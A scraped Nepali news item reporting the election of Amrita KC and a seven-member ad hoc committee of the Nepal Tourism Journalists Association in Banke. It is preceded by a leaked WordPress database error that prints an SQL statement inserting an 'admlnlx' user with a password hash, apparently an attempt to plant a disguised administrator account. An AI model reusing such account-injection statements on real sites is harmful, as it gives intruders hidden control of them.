WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3BjLfOa67NK./df2qksaNtD8J6TZW0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 13:03:10', '', 'admlnlx', 'admlnlx')
बाँके, पुस १८–
नेपाल पर्यटन पत्रकार सङ्घ, बाँकेको अध्यक्षमा अमृता केसी चयन हुनुभएको छ ।
बाँकेमा क्रियाशील पत्रकारको एक भेलाले आइतबार सात सदस्यीय तदर्थ समिति गठन गरेको हो । नेपाल पत्रकार महासङ्घ बाँकेको महिला विभाग प्रमुख समेत रहनुभएका केसीको अध्यक्षतामा गठन गरिएको सङ्घको उपाध्यक्षमा कृष्ण ओली, सचिवमा मधु पौडेल र कोषाध्यक्षमा निर्मल आचार्य रहनुभएको छ ।
यस्तै सदस्यमा विमला चौधरी, केशव राना र रुवी साई चयन हुनुभएको छ । भेलाले नेपालगन्ज उद्योग वाणिज्य सङ्घ, होटल व्यवसायी सङ्घ नेपालगन्ज र पत्रकार महासङ्घ बाँकेलाई संस्थागत सल्लाहकारका रुपमा चयन गरेको छ ।
नवगठित सङ्घका अध्यक्ष केसीले बाँके जिल्लाको पर्यटन प्रवद्र्धनका लागि सञ्चार पैरवी गर्ने बताउनुभयो । –रासस